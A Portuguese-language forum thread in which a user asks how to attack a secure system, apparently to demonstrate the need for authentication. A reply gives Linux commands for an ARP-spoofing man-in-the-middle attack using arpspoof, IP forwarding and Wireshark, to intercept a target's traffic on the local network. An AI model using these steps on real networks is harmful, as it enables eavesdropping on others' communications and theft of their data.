Como atacar um sistema seguro

Não sei se eh esse tipo de ataque q vc quer, mas vc pode tentar o tipo de ataque “homem no meio”, isso no linux eh bem simples de fazer, se for isso msm eh so falar q dou mais explicacoes.

Acredito que esse ataque ai seja passivo ne? Onde o atacante so captura as informações sem alterá-las, correto? Se for me serve sim… esse tipo de ataque ajudaria a demonstrar a necessidade de autenticar as partes que se comunicam.

Qualquer dica é valida.

Jadugar:

Acredito que esse ataque ai seja passivo ne? Onde o atacante so captura as informações sem alterá-las, correto? Se for me serve sim… esse tipo de ataque ajudaria a demonstrar a necessidade de autenticar as partes que se comunicam.

Qualquer dica é valida.

Sim, tradicionalmente, mas é possivel alterar as informações também, só que da muito trabalho e é bem dificil. Já so capturar as informações é bem tranquilo. Pra fazer esse tipo de ataque o atacante deve estar na mesma rede q o atacado.
Em um terminal linux digite:

apt-get dsniff wireshark
isso instala os programas q vc ira utilizar.

echo 1 > /proc/sys/net/ipv4/ip_forward
isso faz o linux retransmitir os pacotes q ele recebe.

arpspoof -t ip_alvo ip_falso
isso diz para o ip_alvo q vc eh o ip falso, o ip_alvo eh a maquina atacada, o ip_falso pode ser o servidor se ele tb estiver na rede ou o gatway da rede.

arpspoof -t ip_falso ip_alvo
isso diz para o gatway ou o servidor q vc eh a maquina atacada, assim vc recebe toda a comunicacao entre a maquina atacada e o servidor(ou o gatway).

feito isso abra o wireshark e analise os pacotes q vc esta recebendo, vc poderá ver as requisicoes e respostas q estao sendo feitas coisa e tal.

espero ter ajudado.

agora

Ajudou sim… muito obrigado. Vou testar quando estiver em casa.

Se alguem tiver mais dicas…